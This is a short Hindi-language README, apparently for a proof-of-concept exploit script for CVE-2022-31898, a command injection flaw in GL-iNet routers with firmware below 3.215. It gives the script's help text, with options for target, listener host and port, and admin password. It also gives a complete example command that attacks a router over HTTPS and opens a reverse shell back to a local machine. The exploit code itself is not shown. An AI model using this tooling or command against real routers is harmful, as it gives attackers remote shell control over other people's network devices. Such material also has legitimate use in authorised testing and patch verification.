
CVE-2022-31898 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो GL-iNet राउटरों (फ़र्मवेयर < 3.215) में एक कमांड इंजेक्शन भेद्यता है। कॉन्फ़िगर करने योग्य प्रमाणीकरण के साथ HTTP/HTTPS के माध्यम से रिवर्स शेल प्रदान करता है।
CVE-2022-31898 के लिए एक्सप्लॉइट POC कोड, GL-iNet राउटर्स में 3.215 से नीचे के फर्मवेयर के लिए कमांड इंजेक्शन
./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]
options:
-h, --help show this help message and exit
-R RHOST, --rhost RHOST
IP/hostname of Mango router
-P RPORT, --rport RPORT
Port to connect to Mango router on
-L LHOST, --lhost LHOST
Local host/IP for reverse shell to connect back to
-l LPORT, --lport LPORT
Local port for reverse shell to connect back on
-p PWD, --pwd PWD Password to use to log in
-t, --https If set, use HTTPS
192.168.8.1 पर GL-iNet राउटर को HTTPS के माध्यम से एक्सप्लॉइट करें और एडमिन पासवर्ड password के साथ स्थानीय बॉक्स 192.168.8.123:8008 पर वापस कनेक्ट करें:
./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t